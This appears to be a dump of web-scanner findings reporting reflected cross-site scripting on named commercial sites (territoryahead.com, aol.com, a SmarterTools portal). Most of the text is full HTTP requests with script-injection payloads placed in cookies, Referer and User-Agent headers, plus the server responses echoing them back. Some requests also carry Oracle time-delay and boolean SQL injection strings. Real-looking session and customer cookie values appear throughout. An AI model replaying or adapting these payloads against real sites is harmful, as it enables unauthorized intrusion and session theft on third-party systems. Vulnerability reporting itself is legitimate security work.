The value of the Referer HTTP header is copied into an HTML comment. The payload 3ba62--><script>alert(1)</script>19ec2497be6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e Referer: http://www.google.com/search?hl=en&q=3ba62--><script>alert(1)</script>19ec2497be6
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:27:09 GMT Server: Apache ETag: "AAAAS7ucUQm" Last-Modified: Fri, 25 Mar 2011 19:15:23 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 926e9--><script>alert(1)</script>5e35377ec36 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16926e9--><script>alert(1)</script>5e35377ec36 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:27:00 GMT Server: Apache ETag: "AAAAS7ucSNw" Last-Modified: Fri, 25 Mar 2011 19:15:15 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38447
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="ve ...[SNIP]... ers: Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16926e9--><script>alert(1)</script>5e35377ec36 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: IS ...[SNIP]...
The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload fe233<script>alert(1)</script>e5e34b07103 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ST.ashx?scriptonly=true HTTP/1.1 Host: portal.smartertools.com Proxy-Connection: keep-alive Referer: http://forums.smartertools.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942bfe233<script>alert(1)</script>e5e34b07103; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; __utma=61502381.1558309378.1300551951.1300557309.1300912321.4
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/javascript Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Compressed-By: HttpCompress X-Powered-By: ASP.NET Date: Sat, 26 Mar 2011 16:43:40 GMT Content-Length: 33118
The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e131d"-alert(1)-"4408da0b00a was submitted in the dlact cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.aol.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; stips5=1; dlact=dl3e131d"-alert(1)-"4408da0b00a; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; s_pers=%20s_getnr%3D1301171833374-Repeat%7C1364243833374%3B%20s_nrgvo%3DRepeat%7C1364243833377%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcommem%253D%252526pid%25253Dacm%25252520%2525253A%25252520main5%25252520AOL.com%252525205.0%25252520Main%252526pidt%25253D1%252526oid%25253Daol-jumpbar1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac ...[SNIP]... <script type="text/javascript"> var dlImps = new Array();dlImps["dl1"]=true; var dlact = "dl3e131d"-alert(1)-"4408da0b00a"; var dlduration = 10000; var dloverrided = false; var dlcurr = 1; var dltotal = 14; var paramslot = "dynamiclead"; var dloffset = 0; var ftmslo ...[SNIP]...
The value of the CoreID6 cookie is copied into an HTML comment. The payload 97c44--><script>alert(1)</script>24a58cae691 was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209497c44--><script>alert(1)</script>24a58cae691; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:34:46 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the PS_ALL cookie is copied into an HTML comment. The payload 1a21a--><script>alert(1)</script>b0d0d16d38e was submitted in the PS_ALL cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount1a21a--><script>alert(1)</script>b0d0d16d38e
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:34:50 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the customer cookie is copied into an HTML comment. The payload 5093e--><script>alert(1)</script>bdfc4321075 was submitted in the customer cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=926439315093e--><script>alert(1)</script>bdfc4321075; PS_ALL=%23ps_catid%7Eaccount
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:34:48 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the mmlID cookie is copied into an HTML comment. The payload 36d2e--><script>alert(1)</script>1deb5b8a81e was submitted in the mmlID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=6840816836d2e--><script>alert(1)</script>1deb5b8a81e; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:34:45 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the order cookie is copied into an HTML comment. The payload 52f6b--><script>alert(1)</script>94ebbb28b25 was submitted in the order cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=6350391452f6b--><script>alert(1)</script>94ebbb28b25; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:25:57 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the 90232094_clogin cookie is copied into an HTML comment. The payload 8af22--><script>alert(1)</script>26113198838 was submitted in the 90232094_clogin cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=13010823252448af22--><script>alert(1)</script>26113198838
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:29:35 GMT Server: Apache ETag: "AAAAS7uc384" Last-Modified: Fri, 25 Mar 2011 19:17:50 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 39295
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the CoreID6 cookie is copied into an HTML comment. The payload 70ca4--><script>alert(1)</script>974b3a0bf3c was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209470ca4--><script>alert(1)</script>974b3a0bf3c; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:25:47 GMT Server: Apache ETag: "AAAAS7ucAYc" Last-Modified: Fri, 25 Mar 2011 19:14:02 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38491
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the JSESSIONID cookie is copied into an HTML comment. The payload c0c2f--><script>alert(1)</script>048dd4a1770 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-ec0c2f--><script>alert(1)</script>048dd4a1770
The value of the PS_ALL cookie is copied into an HTML comment. The payload 96a8c--><script>alert(1)</script>5d6a7c7b9bc was submitted in the PS_ALL cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d1096a8c--><script>alert(1)</script>5d6a7c7b9bc; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:20:21 GMT Server: Apache ETag: "AAAAS7ucy4D" Last-Modified: Fri, 25 Mar 2011 19:17:29 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38741
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the cmTPSet cookie is copied into an HTML comment. The payload c8e35--><script>alert(1)</script>691c4488899 was submitted in the cmTPSet cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Yc8e35--><script>alert(1)</script>691c4488899; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:20:06 GMT Server: Apache ETag: "AAAAS7ucvNU" Last-Modified: Fri, 25 Mar 2011 19:17:14 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 39295
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the customer cookie is copied into an HTML comment. The payload 451ec--><script>alert(1)</script>e1e6716de1c was submitted in the customer cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931451ec--><script>alert(1)</script>e1e6716de1c; JSESSIONID=a-e7l_ipIG-e
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:17:17 GMT Server: Apache ETag: "AAAAS7ucGB4" Last-Modified: Fri, 25 Mar 2011 19:14:25 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38491
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
